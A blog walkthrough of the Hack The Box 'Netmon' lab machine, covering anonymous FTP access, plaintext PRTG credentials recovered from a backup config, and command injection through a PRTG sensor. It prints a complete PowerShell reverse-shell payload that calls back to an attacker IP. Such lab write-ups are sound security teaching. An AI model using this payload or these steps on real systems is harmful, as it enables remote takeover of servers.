Netmon - Hack The Box

Resolution of the Netmon machine

May 19, 2020 - 5 minute read -
HackTheBox

Netmon banner

Netmon is an easy level machine based on Windows, has two open services where the first one is a FTP server that exposes the entire system and the last one is a vulnerable web application called PRTG Network Monitor that monitors the system network.

Recon

Starting with Nmap:

# Nmap 7.70 scan initiated Fri Jan 17 11:02:18 2020 as: nmap -sV -sC -oA netmon -T4 -Pn 10.10.10.152
Nmap scan report for 10.10.10.152
Host is up (0.22s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1m38s, deviation: 0s, median: 1m37s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-17 11:04:21
|_  start_date: 2020-01-17 10:51:53

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 17 11:02:49 2020 -- 1 IP address (1 host up) scanned in 31.34 seconds

One thing that caught our attention is that the port 21 seems interesting because it allows an anonymous login that listen to the entire Windows system directory.

Netmon Recon

Now we can capture the user flag easily through the FTP:

Netmon Recon

The next step is to exploit the web application called PRTG Network Monitor. Googling about any exploit suitable for that application and we found an vulnerability where an attacker could retrieve PRTG credentials in plain text!

PRTG exposes Domain accounts and passwords in plain text.

All copies generated by a PRTG Network Monitor version 17.4.35.3326 or later can be affected.

What’s next?

We recommend that you delete all affected copies of the PRTG Configuration.dat file Automatically generated backups under: C:\ProgramData\Paessler\PRTG Network Monitor\Configuration Auto-Backups\Automatically generated temporary files that may exist:

C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old.

C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.nul.

Knowing that we have access to the server’s FTP and we can look for that files. Looking for some time we found a file called PRTG Configuration.old.bak that is located at /Users/All Users/Paessler/PRTG Network Monitor.

Searching inside the file we found an interesting string that appears to be a credential:

Netmon Recon

Exploiting - Exploiting a vulnerability on PRTG device sensors

Now that we have the web application credentials, let’s try it on the administrator panel:

Netmon Exploiting

But using these credentials we’re unable to login, changing the password PrTg@dmin2018 to PrTg@dmin2019 works!

Netmon Exploiting

The PRTG Network Monitor monitors the system network with the help of network devices and sensors, they can be added as modules. There’s a specific sensor that deals with PowerShell stuff where it’s possible to inject system commands as a parameter. To exploit that vulnerability let’s click on Devices, then GATEWAY section and adding a sensor clicking on Add Sensor or accessing the URL http://10.10.10.152/addsensor.htm?id=2004.

We select Custom Sensors and then we add the sensor EXE/Script:

Netmon Exploiting

On EXE/Script we select Demo Powershell Script - Available MB via WMI.ps1 following by the bellow reverse shell payload:

;$client = New-Object System.Net.Sockets.TCPClient('10.10.14.XX',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Netmon Exploiting

Let’s save the new sensor and set up the netcat on listening mode, after that we click on Check Now to activate our malicious sensor.

After that we got our reverse shell:

Netmon Exploiting

Exploiting - Using a custom exploit

For knowledge purposes I made a custom exploit that exploits the PRTG Network Monitor vulnerability and spawn an interactive reverse shell to us, it’s available on my GitHub :)

Netmon Exploit

Netmon Exploit

For our surprise the PRTG Network Monitor run as system administrator, we can capture the root flag without any privilege escalation!

Netmon Exploiting